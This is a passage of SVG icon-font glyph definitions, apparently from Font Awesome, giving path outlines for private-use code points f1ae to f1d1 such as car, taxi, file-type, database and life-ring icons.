<glyph unicode="&#xf1ae;" horiz-adv-x="1280" d="M1188 988l-292 -292v-824q0 -46 -33 -79t-79 -33t-79 33t-33 79v384h-64v-384q0 -46 -33 -79t-79 -33t-79 33t-33 79v824l-292 292q-28 28 -28 68t28 68t68 28t68 -28l228 -228h368l228 228q28 28 68 28t68 -28t28 -68t-28 -68zM864 1152q0 -93 -65.5 -158.5 t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
<glyph unicode="&#xf1b0;" horiz-adv-x="1664" d="M780 1064q0 -60 -19 -113.5t-63 -92.5t-105 -39q-76 0 -138 57.5t-92 135.5t-30 151q0 60 19 113.5t63 92.5t105 39q77 0 138.5 -57.5t91.5 -135t30 -151.5zM438 581q0 -80 -42 -139t-119 -59q-76 0 -141.5 55.5t-100.5 133.5t-35 152q0 80 42 139.5t119 59.5 q76 0 141.5 -55.5t100.5 -134t35 -152.5zM832 608q118 0 255 -97.5t229 -237t92 -254.5q0 -46 -17 -76.5t-48.5 -45t-64.5 -20t-76 -5.5q-68 0 -187.5 45t-182.5 45q-66 0 -192.5 -44.5t-200.5 -44.5q-183 0 -183 146q0 86 56 191.5t139.5 192.5t187.5 146t193 59zM1071 819 q-61 0 -105 39t-63 92.5t-19 113.5q0 74 30 151.5t91.5 135t138.5 57.5q61 0 105 -39t63 -92.5t19 -113.5q0 -73 -30 -151t-92 -135.5t-138 -57.5zM1503 923q77 0 119 -59.5t42 -139.5q0 -74 -35 -152t-100.5 -133.5t-141.5 -55.5q-77 0 -119 59t-42 139q0 74 35 152.5 t100.5 134t141.5 55.5z" />
<glyph unicode="&#xf1b1;" horiz-adv-x="768" d="M704 1008q0 -145 -57 -243.5t-152 -135.5l45 -821q2 -26 -16 -45t-44 -19h-192q-26 0 -44 19t-16 45l45 821q-95 37 -152 135.5t-57 243.5q0 128 42.5 249.5t117.5 200t160 78.5t160 -78.5t117.5 -200t42.5 -249.5z" />
<glyph unicode="&#xf1b2;" horiz-adv-x="1792" d="M896 -93l640 349v636l-640 -233v-752zM832 772l698 254l-698 254l-698 -254zM1664 1024v-768q0 -35 -18 -65t-49 -47l-704 -384q-28 -16 -61 -16t-61 16l-704 384q-31 17 -49 47t-18 65v768q0 40 23 73t61 47l704 256q22 8 44 8t44 -8l704 -256q38 -14 61 -47t23 -73z " />
<glyph unicode="&#xf1b3;" horiz-adv-x="2304" d="M640 -96l384 192v314l-384 -164v-342zM576 358l404 173l-404 173l-404 -173zM1664 -96l384 192v314l-384 -164v-342zM1600 358l404 173l-404 173l-404 -173zM1152 651l384 165v266l-384 -164v-267zM1088 1030l441 189l-441 189l-441 -189zM2176 512v-416q0 -36 -19 -67 t-52 -47l-448 -224q-25 -14 -57 -14t-57 14l-448 224q-5 2 -7 4q-2 -2 -7 -4l-448 -224q-25 -14 -57 -14t-57 14l-448 224q-33 16 -52 47t-19 67v416q0 38 21.5 70t56.5 48l434 186v400q0 38 21.5 70t56.5 48l448 192q23 10 50 10t50 -10l448 -192q35 -16 56.5 -48t21.5 -70 v-400l434 -186q36 -16 57 -48t21 -70z" />
<glyph unicode="&#xf1b4;" horiz-adv-x="2048" d="M1848 1197h-511v-124h511v124zM1596 771q-90 0 -146 -52.5t-62 -142.5h408q-18 195 -200 195zM1612 186q63 0 122 32t76 87h221q-100 -307 -427 -307q-214 0 -340.5 132t-126.5 347q0 208 130.5 345.5t336.5 137.5q138 0 240.5 -68t153 -179t50.5 -248q0 -17 -2 -47h-658 q0 -111 57.5 -171.5t166.5 -60.5zM277 236h296q205 0 205 167q0 180 -199 180h-302v-347zM277 773h281q78 0 123.5 36.5t45.5 113.5q0 144 -190 144h-260v-294zM0 1282h594q87 0 155 -14t126.5 -47.5t90 -96.5t31.5 -154q0 -181 -172 -263q114 -32 172 -115t58 -204 q0 -75 -24.5 -136.5t-66 -103.5t-98.5 -71t-121 -42t-134 -13h-611v1260z" />
<glyph unicode="&#xf1b5;" d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960zM499 1041h-371v-787h382q117 0 197 57.5t80 170.5q0 158 -143 200q107 52 107 164q0 57 -19.5 96.5 t-56.5 60.5t-79 29.5t-97 8.5zM477 723h-176v184h163q119 0 119 -90q0 -94 -106 -94zM486 388h-185v217h189q124 0 124 -113q0 -104 -128 -104zM1136 356q-68 0 -104 38t-36 107h411q1 10 1 30q0 132 -74.5 220.5t-203.5 88.5q-128 0 -210 -86t-82 -216q0 -135 79 -217 t213 -82q205 0 267 191h-138q-11 -34 -47.5 -54t-75.5 -20zM1126 722q113 0 124 -122h-254q4 56 39 89t91 33zM964 988h319v-77h-319v77z" />
<glyph unicode="&#xf1b6;" horiz-adv-x="1792" d="M1582 954q0 -101 -71.5 -172.5t-172.5 -71.5t-172.5 71.5t-71.5 172.5t71.5 172.5t172.5 71.5t172.5 -71.5t71.5 -172.5zM812 212q0 104 -73 177t-177 73q-27 0 -54 -6l104 -42q77 -31 109.5 -106.5t1.5 -151.5q-31 -77 -107 -109t-152 -1q-21 8 -62 24.5t-61 24.5 q32 -60 91 -96.5t130 -36.5q104 0 177 73t73 177zM1642 953q0 126 -89.5 215.5t-215.5 89.5q-127 0 -216.5 -89.5t-89.5 -215.5q0 -127 89.5 -216t216.5 -89q126 0 215.5 89t89.5 216zM1792 953q0 -189 -133.5 -322t-321.5 -133l-437 -319q-12 -129 -109 -218t-229 -89 q-121 0 -214 76t-118 192l-230 92v429l389 -157q79 48 173 48q13 0 35 -2l284 407q2 187 135.5 319t320.5 132q188 0 321.5 -133.5t133.5 -321.5z" />
<glyph unicode="&#xf1b7;" d="M1242 889q0 80 -57 136.5t-137 56.5t-136.5 -57t-56.5 -136q0 -80 56.5 -136.5t136.5 -56.5t137 56.5t57 136.5zM632 301q0 -83 -58 -140.5t-140 -57.5q-56 0 -103 29t-72 77q52 -20 98 -40q60 -24 120 1.5t85 86.5q24 60 -1.5 120t-86.5 84l-82 33q22 5 42 5 q82 0 140 -57.5t58 -140.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v153l172 -69q20 -92 93.5 -152t168.5 -60q104 0 181 70t87 173l345 252q150 0 255.5 105.5t105.5 254.5q0 150 -105.5 255.5t-255.5 105.5 q-148 0 -253 -104.5t-107 -252.5l-225 -322q-9 1 -28 1q-75 0 -137 -37l-297 119v468q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5zM1289 887q0 -100 -71 -170.5t-171 -70.5t-170.5 70.5t-70.5 170.5t70.5 171t170.5 71q101 0 171.5 -70.5t70.5 -171.5z " />
<glyph unicode="&#xf1b8;" horiz-adv-x="1792" d="M836 367l-15 -368l-2 -22l-420 29q-36 3 -67 31.5t-47 65.5q-11 27 -14.5 55t4 65t12 55t21.5 64t19 53q78 -12 509 -28zM449 953l180 -379l-147 92q-63 -72 -111.5 -144.5t-72.5 -125t-39.5 -94.5t-18.5 -63l-4 -21l-190 357q-17 26 -18 56t6 47l8 18q35 63 114 188 l-140 86zM1680 436l-188 -359q-12 -29 -36.5 -46.5t-43.5 -20.5l-18 -4q-71 -7 -219 -12l8 -164l-230 367l211 362l7 -173q170 -16 283 -5t170 33zM895 1360q-47 -63 -265 -435l-317 187l-19 12l225 356q20 31 60 45t80 10q24 -2 48.5 -12t42 -21t41.5 -33t36 -34.5 t36 -39.5t32 -35zM1550 1053l212 -363q18 -37 12.5 -76t-27.5 -74q-13 -20 -33 -37t-38 -28t-48.5 -22t-47 -16t-51.5 -14t-46 -12q-34 72 -265 436l313 195zM1407 1279l142 83l-220 -373l-419 20l151 86q-34 89 -75 166t-75.5 123.5t-64.5 80t-47 46.5l-17 13l405 -1 q31 3 58 -10.5t39 -28.5l11 -15q39 -61 112 -190z" />
<glyph unicode="&#xf1b9;" horiz-adv-x="2048" d="M480 448q0 66 -47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47t113 47t47 113zM516 768h1016l-89 357q-2 8 -14 17.5t-21 9.5h-768q-9 0 -21 -9.5t-14 -17.5zM1888 448q0 66 -47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47t113 47t47 113zM2048 544v-384 q0 -14 -9 -23t-23 -9h-96v-128q0 -80 -56 -136t-136 -56t-136 56t-56 136v128h-1024v-128q0 -80 -56 -136t-136 -56t-136 56t-56 136v128h-96q-14 0 -23 9t-9 23v384q0 93 65.5 158.5t158.5 65.5h28l105 419q23 94 104 157.5t179 63.5h768q98 0 179 -63.5t104 -157.5 l105 -419h28q93 0 158.5 -65.5t65.5 -158.5z" />
<glyph unicode="&#xf1ba;" horiz-adv-x="2048" d="M1824 640q93 0 158.5 -65.5t65.5 -158.5v-384q0 -14 -9 -23t-23 -9h-96v-64q0 -80 -56 -136t-136 -56t-136 56t-56 136v64h-1024v-64q0 -80 -56 -136t-136 -56t-136 56t-56 136v64h-96q-14 0 -23 9t-9 23v384q0 93 65.5 158.5t158.5 65.5h28l105 419q23 94 104 157.5 t179 63.5h128v224q0 14 9 23t23 9h448q14 0 23 -9t9 -23v-224h128q98 0 179 -63.5t104 -157.5l105 -419h28zM320 160q66 0 113 47t47 113t-47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47zM516 640h1016l-89 357q-2 8 -14 17.5t-21 9.5h-768q-9 0 -21 -9.5t-14 -17.5z M1728 160q66 0 113 47t47 113t-47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47z" />
<glyph unicode="&#xf1bb;" d="M1504 64q0 -26 -19 -45t-45 -19h-462q1 -17 6 -87.5t5 -108.5q0 -25 -18 -42.5t-43 -17.5h-320q-25 0 -43 17.5t-18 42.5q0 38 5 108.5t6 87.5h-462q-26 0 -45 19t-19 45t19 45l402 403h-229q-26 0 -45 19t-19 45t19 45l402 403h-197q-26 0 -45 19t-19 45t19 45l384 384 q19 19 45 19t45 -19l384 -384q19 -19 19 -45t-19 -45t-45 -19h-197l402 -403q19 -19 19 -45t-19 -45t-45 -19h-229l402 -403q19 -19 19 -45z" />
<glyph unicode="&#xf1bc;" d="M1127 326q0 32 -30 51q-193 115 -447 115q-133 0 -287 -34q-42 -9 -42 -52q0 -20 13.5 -34.5t35.5 -14.5q5 0 37 8q132 27 243 27q226 0 397 -103q19 -11 33 -11q19 0 33 13.5t14 34.5zM1223 541q0 40 -35 61q-237 141 -548 141q-153 0 -303 -42q-48 -13 -48 -64 q0 -25 17.5 -42.5t42.5 -17.5q7 0 37 8q122 33 251 33q279 0 488 -124q24 -13 38 -13q25 0 42.5 17.5t17.5 42.5zM1331 789q0 47 -40 70q-126 73 -293 110.5t-343 37.5q-204 0 -364 -47q-23 -7 -38.5 -25.5t-15.5 -48.5q0 -31 20.5 -52t51.5 -21q11 0 40 8q133 37 307 37 q159 0 309.5 -34t253.5 -95q21 -12 40 -12q29 0 50.5 20.5t21.5 51.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf1bd;" horiz-adv-x="1024" d="M1024 1233l-303 -582l24 -31h279v-415h-507l-44 -30l-142 -273l-30 -30h-301v303l303 583l-24 30h-279v415h507l44 30l142 273l30 30h301v-303z" />
<glyph unicode="&#xf1be;" horiz-adv-x="2304" d="M784 164l16 241l-16 523q-1 10 -7.5 17t-16.5 7q-9 0 -16 -7t-7 -17l-14 -523l14 -241q1 -10 7.5 -16.5t15.5 -6.5q22 0 24 23zM1080 193l11 211l-12 586q0 16 -13 24q-8 5 -16 5t-16 -5q-13 -8 -13 -24l-1 -6l-10 -579q0 -1 11 -236v-1q0 -10 6 -17q9 -11 23 -11 q11 0 20 9q9 7 9 20zM35 533l20 -128l-20 -126q-2 -9 -9 -9t-9 9l-17 126l17 128q2 9 9 9t9 -9zM121 612l26 -207l-26 -203q-2 -9 -10 -9q-9 0 -9 10l-23 202l23 207q0 9 9 9q8 0 10 -9zM401 159zM213 650l25 -245l-25 -237q0 -11 -11 -11q-10 0 -12 11l-21 237l21 245 q2 12 12 12q11 0 11 -12zM307 657l23 -252l-23 -244q-2 -13 -14 -13q-13 0 -13 13l-21 244l21 252q0 13 13 13q12 0 14 -13zM401 639l21 -234l-21 -246q-2 -16 -16 -16q-6 0 -10.5 4.5t-4.5 11.5l-20 246l20 234q0 6 4.5 10.5t10.5 4.5q14 0 16 -15zM784 164zM495 785 l21 -380l-21 -246q0 -7 -5 -12.5t-12 -5.5q-16 0 -18 18l-18 246l18 380q2 18 18 18q7 0 12 -5.5t5 -12.5zM589 871l19 -468l-19 -244q0 -8 -5.5 -13.5t-13.5 -5.5q-18 0 -20 19l-16 244l16 468q2 19 20 19q8 0 13.5 -5.5t5.5 -13.5zM687 911l18 -506l-18 -242 q-2 -21 -22 -21q-19 0 -21 21l-16 242l16 506q0 9 6.5 15.5t14.5 6.5q9 0 15 -6.5t7 -15.5zM1079 169v0v0zM881 915l15 -510l-15 -239q0 -10 -7.5 -17.5t-17.5 -7.5t-17 7t-8 18l-14 239l14 510q0 11 7.5 18t17.5 7t17.5 -7t7.5 -18zM980 896l14 -492l-14 -236q0 -11 -8 -19 t-19 -8t-19 8t-9 19l-12 236l12 492q1 12 9 20t19 8t18.5 -8t8.5 -20zM1192 404l-14 -231v0q0 -13 -9 -22t-22 -9t-22 9t-10 22l-6 114l-6 117l12 636v3q2 15 12 24q9 7 20 7q8 0 15 -5q14 -8 16 -26zM2304 423q0 -117 -83 -199.5t-200 -82.5h-786q-13 2 -22 11t-9 22v899 q0 23 28 33q85 34 181 34q195 0 338 -131.5t160 -323.5q53 22 110 22q117 0 200 -83t83 -201z" />
<glyph unicode="&#xf1c0;" d="M768 768q237 0 443 43t325 127v-170q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5t-103 128v170q119 -84 325 -127t443 -43zM768 0q237 0 443 43t325 127v-170q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5t-103 128v170q119 -84 325 -127 t443 -43zM768 384q237 0 443 43t325 127v-170q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5t-103 128v170q119 -84 325 -127t443 -43zM768 1536q208 0 385 -34.5t280 -93.5t103 -128v-128q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5 t-103 128v128q0 69 103 128t280 93.5t385 34.5z" />
<glyph unicode="&#xf1c1;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M894 465q33 -26 84 -56q59 7 117 7q147 0 177 -49q16 -22 2 -52q0 -1 -1 -2l-2 -2v-1q-6 -38 -71 -38q-48 0 -115 20t-130 53q-221 -24 -392 -83q-153 -262 -242 -262q-15 0 -28 7l-24 12q-1 1 -6 5q-10 10 -6 36q9 40 56 91.5t132 96.5q14 9 23 -6q2 -2 2 -4q52 85 107 197 q68 136 104 262q-24 82 -30.5 159.5t6.5 127.5q11 40 42 40h21h1q23 0 35 -15q18 -21 9 -68q-2 -6 -4 -8q1 -3 1 -8v-30q-2 -123 -14 -192q55 -164 146 -238zM318 54q52 24 137 158q-51 -40 -87.5 -84t-49.5 -74zM716 974q-15 -42 -2 -132q1 7 7 44q0 3 7 43q1 4 4 8 q-1 1 -1 2t-0.5 1.5t-0.5 1.5q-1 22 -13 36q0 -1 -1 -2v-2zM592 313q135 54 284 81q-2 1 -13 9.5t-16 13.5q-76 67 -127 176q-27 -86 -83 -197q-30 -56 -45 -83zM1238 329q-24 24 -140 24q76 -28 124 -28q14 0 18 1q0 1 -2 3z" />
<glyph unicode="&#xf1c2;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M233 768v-107h70l164 -661h159l128 485q7 20 10 46q2 16 2 24h4l3 -24q1 -3 3.5 -20t5.5 -26l128 -485h159l164 661h70v107h-300v-107h90l-99 -438q-5 -20 -7 -46l-2 -21h-4l-3 21q-1 5 -4 21t-5 25l-144 545h-114l-144 -545q-2 -9 -4.5 -24.5t-3.5 -21.5l-4 -21h-4l-2 21 q-2 26 -7 46l-99 438h90v107h-300z" />
<glyph unicode="&#xf1c3;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M429 106v-106h281v106h-75l103 161q5 7 10 16.5t7.5 13.5t3.5 4h2q1 -4 5 -10q2 -4 4.5 -7.5t6 -8t6.5 -8.5l107 -161h-76v-106h291v106h-68l-192 273l195 282h67v107h-279v-107h74l-103 -159q-4 -7 -10 -16.5t-9 -13.5l-2 -3h-2q-1 4 -5 10q-6 11 -17 23l-106 159h76v107 h-290v-107h68l189 -272l-194 -283h-68z" />
<glyph unicode="&#xf1c4;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M416 106v-106h327v106h-93v167h137q76 0 118 15q67 23 106.5 87t39.5 146q0 81 -37 141t-100 87q-48 19 -130 19h-368v-107h92v-555h-92zM769 386h-119v268h120q52 0 83 -18q56 -33 56 -115q0 -89 -62 -120q-31 -15 -78 -15z" />
<glyph unicode="&#xf1c5;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M1280 320v-320h-1024v192l192 192l128 -128l384 384zM448 512q-80 0 -136 56t-56 136t56 136t136 56t136 -56t56 -136t-56 -136t-136 -56z" />
<glyph unicode="&#xf1c6;" d="M640 1152v128h-128v-128h128zM768 1024v128h-128v-128h128zM640 896v128h-128v-128h128zM768 768v128h-128v-128h128zM1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400 v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-128v-128h-128v128h-512v-1536h1280zM781 593l107 -349q8 -27 8 -52q0 -83 -72.5 -137.5t-183.5 -54.5t-183.5 54.5t-72.5 137.5q0 25 8 52q21 63 120 396v128h128v-128h79 q22 0 39 -13t23 -34zM640 128q53 0 90.5 19t37.5 45t-37.5 45t-90.5 19t-90.5 -19t-37.5 -45t37.5 -45t90.5 -19z" />
<glyph unicode="&#xf1c7;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M620 686q20 -8 20 -30v-544q0 -22 -20 -30q-8 -2 -12 -2q-12 0 -23 9l-166 167h-131q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h131l166 167q16 15 35 7zM1037 -3q31 0 50 24q129 159 129 363t-129 363q-16 21 -43 24t-47 -14q-21 -17 -23.5 -43.5t14.5 -47.5 q100 -123 100 -282t-100 -282q-17 -21 -14.5 -47.5t23.5 -42.5q18 -15 40 -15zM826 145q27 0 47 20q87 93 87 219t-87 219q-18 19 -45 20t-46 -17t-20 -44.5t18 -46.5q52 -57 52 -131t-52 -131q-19 -20 -18 -46.5t20 -44.5q20 -17 44 -17z" />
<glyph unicode="&#xf1c8;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M768 768q52 0 90 -38t38 -90v-384q0 -52 -38 -90t-90 -38h-384q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h384zM1260 766q20 -8 20 -30v-576q0 -22 -20 -30q-8 -2 -12 -2q-14 0 -23 9l-265 266v90l265 266q9 9 23 9q4 0 12 -2z" />
<glyph unicode="&#xf1c9;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M480 768q8 11 21 12.5t24 -6.5l51 -38q11 -8 12.5 -21t-6.5 -24l-182 -243l182 -243q8 -11 6.5 -24t-12.5 -21l-51 -38q-11 -8 -24 -6.5t-21 12.5l-226 301q-14 19 0 38zM1282 467q14 -19 0 -38l-226 -301q-8 -11 -21 -12.5t-24 6.5l-51 38q-11 8 -12.5 21t6.5 24l182 243 l-182 243q-8 11 -6.5 24t12.5 21l51 38q11 8 24 6.5t21 -12.5zM662 6q-13 2 -20.5 13t-5.5 24l138 831q2 13 13 20.5t24 5.5l63 -10q13 -2 20.5 -13t5.5 -24l-138 -831q-2 -13 -13 -20.5t-24 -5.5z" />
<glyph unicode="&#xf1ca;" d="M1497 709v-198q-101 -23 -198 -23q-65 -136 -165.5 -271t-181.5 -215.5t-128 -106.5q-80 -45 -162 3q-28 17 -60.5 43.5t-85 83.5t-102.5 128.5t-107.5 184t-105.5 244t-91.5 314.5t-70.5 390h283q26 -218 70 -398.5t104.5 -317t121.5 -235.5t140 -195q169 169 287 406 q-142 72 -223 220t-81 333q0 192 104 314.5t284 122.5q178 0 273 -105.5t95 -297.5q0 -159 -58 -286q-7 -1 -19.5 -3t-46 -2t-63 6t-62 25.5t-50.5 51.5q31 103 31 184q0 87 -29 132t-79 45q-53 0 -85 -49.5t-32 -140.5q0 -186 105 -293.5t267 -107.5q62 0 121 14z" />
<glyph unicode="&#xf1cb;" horiz-adv-x="1792" d="M216 367l603 -402v359l-334 223zM154 511l193 129l-193 129v-258zM973 -35l603 402l-269 180l-334 -223v-359zM896 458l272 182l-272 182l-272 -182zM485 733l334 223v359l-603 -402zM1445 640l193 -129v258zM1307 733l269 180l-603 402v-359zM1792 913v-546 q0 -41 -34 -64l-819 -546q-21 -13 -43 -13t-43 13l-819 546q-34 23 -34 64v546q0 41 34 64l819 546q21 13 43 13t43 -13l819 -546q34 -23 34 -64z" />
<glyph unicode="&#xf1cc;" horiz-adv-x="2048" d="M1800 764q111 -46 179.5 -145.5t68.5 -221.5q0 -164 -118 -280.5t-285 -116.5q-4 0 -11.5 0.5t-10.5 0.5h-1209h-1h-2h-5q-170 10 -288 125.5t-118 280.5q0 110 55 203t147 147q-12 39 -12 82q0 115 82 196t199 81q95 0 172 -58q75 154 222.5 248t326.5 94 q166 0 306 -80.5t221.5 -218.5t81.5 -301q0 -6 -0.5 -18t-0.5 -18zM468 498q0 -122 84 -193t208 -71q137 0 240 99q-16 20 -47.5 56.5t-43.5 50.5q-67 -65 -144 -65q-55 0 -93.5 33.5t-38.5 87.5q0 53 38.5 87t91.5 34q44 0 84.5 -21t73 -55t65 -75t69 -82t77 -75t97 -55 t121.5 -21q121 0 204.5 71.5t83.5 190.5q0 121 -84 192t-207 71q-143 0 -241 -97q14 -16 29.5 -34t34.5 -40t29 -34q66 64 142 64q52 0 92 -33t40 -84q0 -57 -37 -91.5t-94 -34.5q-43 0 -82.5 21t-72 55t-65.5 75t-69.5 82t-77.5 75t-96.5 55t-118.5 21q-122 0 -207 -70.5 t-85 -189.5z" />
<glyph unicode="&#xf1cd;" horiz-adv-x="1792" d="M896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM896 1408q-190 0 -361 -90l194 -194q82 28 167 28t167 -28l194 194q-171 90 -361 90zM218 279l194 194 q-28 82 -28 167t28 167l-194 194q-90 -171 -90 -361t90 -361zM896 -128q190 0 361 90l-194 194q-82 -28 -167 -28t-167 28l-194 -194q171 -90 361 -90zM896 256q159 0 271.5 112.5t112.5 271.5t-112.5 271.5t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5 t271.5 -112.5zM1380 473l194 -194q90 171 90 361t-90 361l-194 -194q28 -82 28 -167t-28 -167z" />
<glyph unicode="&#xf1ce;" horiz-adv-x="1792" d="M1760 640q0 -176 -68.5 -336t-184 -275.5t-275.5 -184t-336 -68.5t-336 68.5t-275.5 184t-184 275.5t-68.5 336q0 213 97 398.5t265 305.5t374 151v-228q-221 -45 -366.5 -221t-145.5 -406q0 -130 51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5 t136.5 204t51 248.5q0 230 -145.5 406t-366.5 221v228q206 -31 374 -151t265 -305.5t97 -398.5z" />
<glyph unicode="&#xf1d0;" horiz-adv-x="1792" d="M19 662q8 217 116 406t305 318h5q0 -1 -1 -3q-8 -8 -28 -33.5t-52 -76.5t-60 -110.5t-44.5 -135.5t-14 -150.5t39 -157.5t108.5 -154q50 -50 102 -69.5t90.5 -11.5t69.5 23.5t47 32.5l16 16q39 51 53 116.5t6.5 122.5t-21 107t-26.5 80l-14 29q-10 25 -30.5 49.5t-43 41 t-43.5 29.5t-35 19l-13 6l104 115q39 -17 78 -52t59 -61l19 -27q1 48 -18.5 103.5t-40.5 87.5l-20 31l161 183l160 -181q-33 -46 -52.5 -102.5t-22.5 -90.5l-4 -33q22 37 61.5 72.5t67.5 52.5l28 17l103 -115q-44 -14 -85 -50t-60 -65l-19 -29q-31 -56 -48 -133.5t-7 -170 t57 -156.5q33 -45 77.5 -60.5t85 -5.5t76 26.5t57.5 33.5l21 16q60 53 96.5 115t48.5 121.5t10 121.5t-18 118t-37 107.5t-45.5 93t-45 72t-34.5 47.5l-13 17q-14 13 -7 13l10 -3q40 -29 62.5 -46t62 -50t64 -58t58.5 -65t55.5 -77t45.5 -88t38 -103t23.5 -117t10.5 -136 q3 -259 -108 -465t-312 -321t-456 -115q-185 0 -351 74t-283.5 198t-184 293t-60.5 353z" />
<glyph unicode="&#xf1d1;" horiz-adv-x="1792" d="M874 -102v-66q-208 6 -385 109.5t-283 275.5l58 34q29 -49 73 -99l65 57q148 -168 368 -212l-17 -86q65 -12 121 -13zM276 428l-83 -28q22 -60 49 -112l-57 -33q-98 180 -98 385t98 385l57 -33q-30 -56 -49 -112l82 -28q-35 -100 -35 -212q0 -109 36 -212zM1528 251 l58 -34q-106 -172 -283 -275.5t-385 -109.5v66q56 1 121 13l-17 86q220 44 368 212l65 -57q44 50 73 99zM1377 805l-233 -80q14 -42 14 -85t-14 -85l232 -80q-31 -92 -98 -169l-185 162q-57 -67 -147 -85l48 -241q-52 -10 -98 -10t-98 10l48 241q-90 18 -147 85l-185 -162 q-67 77 -98 169l232 80q-14 42 -14 85t14 85l-233 80q33 93 99 169l185 -162q59 68 147 86l-48 240q44 10 98 10t98 -10l-48 -240q88 -18 147 -86l185 162q66 -76 99 -169zM874 1448v-66q-65 -2 -121 -13l17 -86q-220 -42 -368 -211l-65 56q-38 -42 -73 -98l-57 33 q106 172 282 275.5t385 109.5zM1705 640q0 -205 -98 -385l-57 33q27 52 49 112l-83 28q36 103 36 212q0 112 -35 212l82 28q-19 56 -49 112l57 33q98 -180 98 -385zM1585 1063l-57 -33q-35 56 -73 98l-65 -56q-148 169 -368 211l17 86q-56 11 -121 13v66q209 -6 385 -109.5 t282 -275.5zM1748 640q0 173 -67.5 331t-181.5 272t-272 181.5t-331 67.5t-331 -67.5t-272 -181.5t-181.5 -272t-67.5 -331t67.5 -331t181.5 -272t272 -181.5t331 -67.5t331 67.5t272 181.5t181.5 272t67.5 331zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71 t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
